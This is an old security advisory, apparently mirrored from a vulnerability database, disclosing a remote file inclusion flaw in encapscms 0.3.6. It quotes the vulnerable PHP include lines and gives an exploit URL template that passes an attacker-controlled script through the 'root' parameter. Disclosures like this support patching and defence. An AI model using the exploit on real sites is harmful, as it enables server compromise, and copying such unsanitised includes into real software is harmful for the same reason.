Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15002
HistoryNov 11, 2006 - 12:00 a.m.

encapscms 0.3.6 - Remote File Include by Firewall

2006-11-1100:00:00
vulners.com
116

########################### Firewall ###########################
encapscms 0.3.6 - Remote File Include by Firewall
BuG FounD by Firewall

Application Affect:

encapscms 0.3.6

Sorce Code:

http://scripts.ringsworld.com/content-management/encapscms-0.3.6.zip

Code:

     include_once($root."core/Config.php");
     include_once($root."core/DB_sql.php");
     include_once($root."core/BlogsCats.php");
     include_once($root."core/Block.php");
     include_once($root."core/Block_sub.php");
     include_once($root."core/Gallery.php");
     include_once($root."core/Pager.php");
     include_once($root."core/GalleryCategory.php");
     include_once($root."core/Misc.php");

ExPloit :

http://www.site.com/encapscms_PATH/core/core.php?root=[Evil Script]

#Contact: [email protected]

GrEatZ :

|Her0|slackwaren|Ozzmadark|slappter|ArCaX-ATH| |Cvir.System|napster|saok|Zlevyn|Azrael|CyberAlexis| |NitroNet|Matasanos|SysRoot|ANtrAX|FaLENcE|Mnox|Xneo.System|

"El ceviche y El pisco es peruano y jamas podran igualar su calidad" - "Viva el Peru"

########################### Firewall ###########################